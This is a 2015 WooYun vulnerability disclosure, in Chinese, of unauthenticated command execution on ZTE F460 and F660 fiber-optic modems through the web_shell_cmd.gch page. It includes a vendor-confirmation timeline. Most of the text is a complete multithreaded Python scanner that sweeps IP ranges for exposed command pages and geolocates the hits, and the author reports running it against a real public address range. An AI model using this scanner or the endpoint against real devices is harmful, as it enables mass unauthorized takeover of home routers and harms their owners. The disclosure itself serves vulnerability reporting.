当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0134226

漏洞标题:中兴F460和F660两款光猫未授权访问导致任意命令执行(附扫描脚本)

相关厂商:中兴通讯股份有限公司

漏洞作者: 路人甲

提交时间:2015-08-15 02:31

修复时间:2015-09-29 06:44

公开时间:2015-09-29 06:44

漏洞类型:未授权访问/权限绕过

危害等级:高

自评Rank:12

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-08-15: 细节已通知厂商并且等待厂商处理中
2015-08-15: 厂商已经确认,细节仅向厂商公开
2015-08-25: 细节向核心白帽子及相关领域专家公开
2015-09-04: 细节向普通白帽子公开
2015-09-14: 细节向实习白帽子公开
2015-09-29: 细节向公众公开

简要描述:

未授权访问命令执行

详细说明:

之前看到中兴的多款光猫存在未授权访问导致的任意命令执行,多个实例中均未涉及到F460和F660这两款设备,特意写了个脚本扫描了下,数量不在少数,都是远程80端口直接访问就可以

漏洞证明:

首先看下两款设备的界面,长得几乎一模一样,只是版本号不同

F460.png

F660.png

图上很容易看出来只需要在IP地址后面加web_shell_cmd.gch就可以直接进入命令执行页面,这跟之前其他几款光猫的漏洞一致。
扫描了27.151.1.1-27.160.1.1这个段,其他段没去扫,看下扫描结果吧

scan.jpg


下面给出扫描脚本的代码:

#!/usr/bin/env python
# coding=utf-8
# code by 92ez.com
# last modify time 2015-05-19 08:50
import Queue
from threading import Thread
import time
import re
import sys
import subprocess
import json
import urllib2
#ip to num
def ip2num(ip):
    ip = [int(x) for x in ip.split('.')]
    return ip[0] << 24 | ip[1] << 16 | ip[2] << 8 | ip[3]
#num to ip
def num2ip(num):
    return '%s.%s.%s.%s' % ((num & 0xff000000) >> 24,
                            (num & 0x00ff0000) >> 16,
                            (num & 0x0000ff00) >> 8,
                            num & 0x000000ff)
#get all ips list between start ip and end ip
def ip_range(start, end):
    return [num2ip(num) for num in range(ip2num(start), ip2num(end) + 1) if num & 0xff]
#main function
def bThread(iplist):
    SETTHREAD = raw_input('Thread: ')
    print '[Note] Running...\n'
    threadl = []
    queue = Queue.Queue()
    hosts = iplist
    for host in hosts:
        queue.put(host)
    threadl = [tThread(queue) for x in xrange(0, int(SETTHREAD))]
    for t in threadl:
        t.start()
    for t in threadl:
        t.join()
#get host position by Taobao API
def getposition(host):
    try:
        ipurl = "http://ip.taobao.com/service/getIpInfo.php?ip="+host
        jsondata = urllib2.urlopen(ipurl).read()
        value = json.loads(jsondata)['data']
        info = [value['country'],value['region'],value['city'],value['isp'] ]
        return info
    except Exception, e:
        print "[Note] Get "+ host+" position failed , will retry ...\n"
        getposition(host)
#create thread
class tThread(Thread):
    def __init__(self, queue):
        Thread.__init__(self)
        self.queue = queue
    def run(self):
        global PORT
        while not self.queue.empty():
            host = self.queue.get()
            try:
                #print host
                checktitle(host,PORT)
            except:
                continue
def checktitle(host,port):
    aimurl = "http://"+host+":"+port+"/web_shell_cmd.gch"
    try:
        f = urllib2.urlopen(aimurl,timeout = 5)
        htmlcontent = f.read()
        f.close()
        if len(htmlcontent) == 4609:
            posinfo = getposition(host)
            title = re.findall(r'<title>(.+?)</title>',htmlcontent)
            print "Fount "+ title[0].encode('utf8') +" , url : "+ aimurl +" ,extra info :"+posinfo[0].encode('utf8')+" "+posinfo[1].encode('utf8')+" "+posinfo[2].encode('utf8')+" "+posinfo[3].encode('utf8')
        
    except Exception, e:
        pass
if __name__ == '__main__':
    print '\nScan ZTE Fxx0 fiber-optic modem program.\n'
    
    startIp = raw_input('Start IP: ')
    endIp = raw_input('End IP: ')
    port = raw_input('Port: ')
    global PORT
    PORT = port
    iplist = ip_range(startIp, endIp)
    print '\n[Note] Total '+str(len(iplist))+" IP...\n"
    bThread(iplist)

修复方案:

限制授权访问

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:13

确认时间:2015-08-15 06:42

厂商回复:

感谢提交,辛苦了

最新状态:

暂无

漏洞评价:

评论